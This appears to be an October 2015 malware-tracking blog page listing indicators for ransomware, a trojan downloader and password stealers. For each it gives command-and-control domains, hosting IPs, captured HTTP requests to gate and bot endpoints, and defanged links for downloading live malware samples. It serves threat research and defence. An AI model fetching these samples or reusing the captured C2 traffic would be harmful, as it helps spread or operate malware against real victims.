Month: October 2015

qbstdn6k7iivyki2.onion(Lending Ransomware Hosted In France Roubaix Ovh Sas)

The Ransomware is hosted with Tor. Domain                                   Address                Country qbstdn6k7iivyki2.onion.direct 5.135.181.100 France HTTP Requests : 5.135.181.100:80 (qbstdn6k7iivyki2.onion.direct) GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2 GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2 HTTP/1.1 Host: qbstdn6k7iivyki2.onion.direct Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse)

Trojan Downloader Hosted In 66 Diferent ip’s

This sample contains a trojan downloader : hxxp://193.28.179.40/loader/harsh02.exe around 1mb size. Hosts List : 94.153.127.132 41.38.71.138 94.254.52.140 46.149.62.141 123.28.95.142 134.17.160.109 178.129.117.110 85.17.31.111 91.246.240.111 5.105.31.117 77.123.167.4 95.65.55.6 178.151.65.6 176.116.194.6 82.211.132.7 180.176.214.13 46.118.178.14 95.76.169.18 5.105.39.19 176.37.119.19 211.120.158.247 46.118.63.248 91.123.153.248 213.111.223.250 27.2.103.254 106.242.117.85 5.105.56.87 117.40.213.89 77.122.167.93 81.198.206.95 173.240.15.54 46.119.56.56 145.249.166.60 77.121.186.60 89.43.129.64 78.139.185.21 176.8.198.22 89.41.38.24 73.38.63.24 182.234.149.25 91.209.96.3 93.79.182.11

indianmoneybag.in(HTTP Password Stealer Hosted In United States Provo Unified Layer)

Mybe Zeus variant. Domains : repository.certum.pl 213.222.201.175 www.download.windowsupdate.com 184.25.56.173 crl.certum.pl 213.222.201.210 myworkmustpayme.xyz 162.144.218.223 www.indianmoneybag.in 104.153.45.242 joemb009i.xyz 162.144.218.223 cryfreeman042.ddns.net 41.138.167.135 HTTP Requests : http://www.indianmoneybag.in/wp-content/themes/twentyfourteen/css/php/gate.php POST /wp-content/themes/twentyfourteen/css/php/gate.php HTTP/1.0 Host: www.indianmoneybag.in Accept: */* Accept-Encoding: identity, *;q=0 Content-Length: 506 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://myworkmustpayme.xyz/wp-admin/css/panel/config.jpg GET /wp-admin/css/panel/config.jpg HTTP/1.1 Accept: */* Connection:

pltd.myjino.ru(HTTP Malware Hosted In Russian Federation Moscow Avguro Technologies Ltd. Hosting Service Provider)

Domain Name : pltd.myjino.ru 81.177.140.144 HTTP Requests : http://pltd.myjino.ru/finsess.php Data : POST /finsess.php HTTP/1.0 Host: pltd.myjino.ru Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Content-Type: application/x-www-form-urlencoded Content-Length: 26 1=1882869218&2=&3=&99=15&^ Get sample here : hxxp://93.95.99.172/0310_crypted.exe Hosting infos : http://whois.domaintools.com/81.177.140.144

righromonhen.ru(HTTP Trojan Password Stealer Hosted In Russian Federation Miragroup Ltd.)

righromonhen.ru 93.171.202.172 www.peak-exposure.co.uk 174.136.12.119 www.depalmaelocatelli.it 62.149.140.139 HTTP Requests hxxp://www.peak-exposure.co.uk/wp-content/plugins/cached_data/k1.exe hxxp://righromonhen.ru/gate.php hxxp://www.depalmaelocatelli.it/wp-content/plugins/cached_data/k1.exe Hosting Infos : http://whois.domaintools.com/93.171.202.172